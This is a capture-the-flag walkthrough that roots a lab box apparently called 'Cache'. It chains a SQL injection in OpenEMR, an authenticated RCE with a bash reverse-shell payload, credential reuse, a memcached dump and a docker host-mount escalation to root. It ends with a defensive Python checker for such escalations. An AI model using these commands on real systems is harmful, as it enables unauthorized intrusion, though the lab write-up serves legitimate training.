Result of nmap scan:
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
|   256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_  256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Heading to the IP address in the browser reveals a website that looks static and old. The login page, however, references an unusually named script, /jquery/functionality.js. Opening it reveals that the only working credentials for the login form are ash:[email protected]_fun. But the page behind it is under construction, with a nice picture of Ace from One Piece.
Further exploration on the Author page shows:
ASH is a Security Researcher (Threat Research Labs), Security Engineer. Hacker, Penetration Tester and Security blogger. He is Editor-in-Chief, Author & Creator of Cache. Check out his other projects like Cache:
HMS (Hospital Management System)
So if we are exploring cache.htb and it says there is an HMS that is like Cache, could there be a similar virtual host for it? Add hms.htb to the /etc/hosts file and we get a login page. It is a CMS called OpenEMR. When facing a CMS, I don't go directly for gobuster, since its structure can be found directly where the CMS is published, such as GitHub, where you can even find listed vulnerabilities.
OpenEMR is on GitHub, but robots.txt does not mention the version. There is an admin.php in the root folder, and http://hms.htb/admin.php reveals the version used is 5.0.1 (3). Still on GitHub, switch to the tag for that version to see the source code deployed at HMS.
Now for vulnerability hunting: searchsploit reveals an RCE for our version, but it requires authentication first. A Google search ended with a PDF containing a ton of vulnerabilities. Follow its instructions to perform a SQL injection through the catid GET parameter of /portal/find_appt_popup_user.php. To speed up exfiltration of the users, you will find the database schema in the repo; the target table is called
Successful SQLMap exploitation gives the credentials openemr_admin:$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. This being a bcrypt hash, pass it to john or hashcat and it comes back as xxxxxx (what a dumb password for an admin, lol).
Now that we are authenticated, it is time to use the exploit we found with searchsploit.
$ searchsploit -m php/webapps/45161.py
$ mv 45161.py openemr_rce.py
# Listen on a port with netcat in another shell
$ python openemr_rce.py http://hms.htb -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/<tun0_ip>/<port> 0>&1'
And you have a shell!
The user flag is owned by and readable only by ash, but we do have a password for ash, found in the Cache JS script. Let's try that:
$ python3 -c 'import pty; pty.spawn("/bin/bash")'   # Spawn a TTY shell
$ su ash
Password: [email protected]_fun
$ id
uid=1000(ash) gid=1000(ash) groups=1000(ash)
Ash can't sudo on the box, so we used the famous linpeas script to check for things we can exploit.
In the process list, I spotted:
memcache 1098 0.0 0.1 425792 4052 ? Ssl 13:30 0:00 /usr/bin/memcached -m 64 -p 11211 -u memcache -l 127.0.0.1 -P /var/run/memcached/memcached.pid
Memcached is listening on 11211 (bound to 127.0.0.1 only), so let's see what information it can give us.
$ telnet localhost 11211
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
stats items
...
stats cachedump 1 100
ITEM link [21 b; 0 s]
ITEM user [5 b; 0 s]
ITEM passwd [9 b; 0 s]
ITEM file [7 b; 0 s]
ITEM account [9 b; 0 s]
END
get passwd
VALUE passwd 0 9
0n3_p1ec3
END
And we got 0n3_p1ec3! That is surely the password of user luffy (I'm a BIG fan of One Piece, by the way).
Now that lateral movement is done, and luffy can't sudo either, let's run linpeas again. The first outputs reveal that luffy is a member of the docker group.
User & Groups:
uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)
This means we can run docker commands, such as deploying containers, and the privilege escalation is now clear: deploy an interactive container and mount the host filesystem as a volume inside it. Since we will be root in the container, we will also be root over the mounted volume, which is the box itself. Let's first check whether there is an image on the box we can use, because if not we would have to set up a Docker registry on our machine, host a useful image there and make the box pull it.
$ docker image ls
REPOSITORY   TAG      IMAGE ID       CREATED        SIZE
ubuntu       latest   2ca708c1c9cc   8 months ago   64.2MB
$ docker run --rm -it -v /:/mnt ubuntu chroot /mnt
#
Congratulations, you just rooted the box.
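From the defender's side, the escalation above works because docker group membership is root-equivalent and nothing stops a bind mount of /. The following Python check is an added example, not part of the original writeup or of linpeas: it flags non-root members of the docker group in an /etc/group listing and detects docker run command lines that bind-mount the host root. The /etc/group content is a constructed sample, and the set of root-equivalent groups is an assumption limited to docker.

```python
import shlex
from typing import Iterable, List

# Groups whose members can become root on the host. Assumption: only docker
# matters for this box; other hosts may need lxd, disk, etc. added.
ROOT_EQUIVALENT_GROUPS = {"docker"}

# Constructed sample of /etc/group (not taken from the box).
SAMPLE_GROUP_FILE = """root:x:0:
adm:x:4:syslog
docker:x:999:luffy
"""


def root_equivalent_members(group_lines: Iterable[str]) -> List[str]:
    """Return 'group:user' for every non-root member of a root-equivalent group."""
    findings = []
    for line in group_lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        name, _pw, _gid, members = line.split(":", 3)
        if name in ROOT_EQUIVALENT_GROUPS:
            findings += [f"{name}:{u}" for u in members.split(",") if u and u != "root"]
    return findings


def mounts_host_root(cmdline: str) -> bool:
    """True when a 'docker run' command line bind-mounts the host's / into the container."""
    argv = shlex.split(cmdline)
    if argv[:2] != ["docker", "run"]:
        return False
    for i, arg in enumerate(argv[2:], start=2):
        if arg in ("-v", "--volume", "--mount") and i + 1 < len(argv):
            value = argv[i + 1]
        elif arg.startswith(("-v=", "--volume=", "--mount=")):
            value = arg.split("=", 1)[1]
        else:
            continue
        if arg.startswith("--mount"):
            # --mount takes key=value pairs, e.g. type=bind,source=/,target=/mnt
            opts = dict(kv.split("=", 1) for kv in value.split(",") if "=" in kv)
            source = opts.get("source", opts.get("src"))
        else:
            source = value.split(":", 1)[0]  # -v host_path:container_path[:opts]
        if source == "/":
            return True
    return False


if __name__ == "__main__":
    print(root_equivalent_members(SAMPLE_GROUP_FILE.splitlines()))
    print(mounts_host_root("docker run --rm -it -v /:/mnt ubuntu chroot /mnt"))
```

Feed the real /etc/group and the docker commands from your process auditing into these functions; any hit on either is a root-equivalent finding worth an alert.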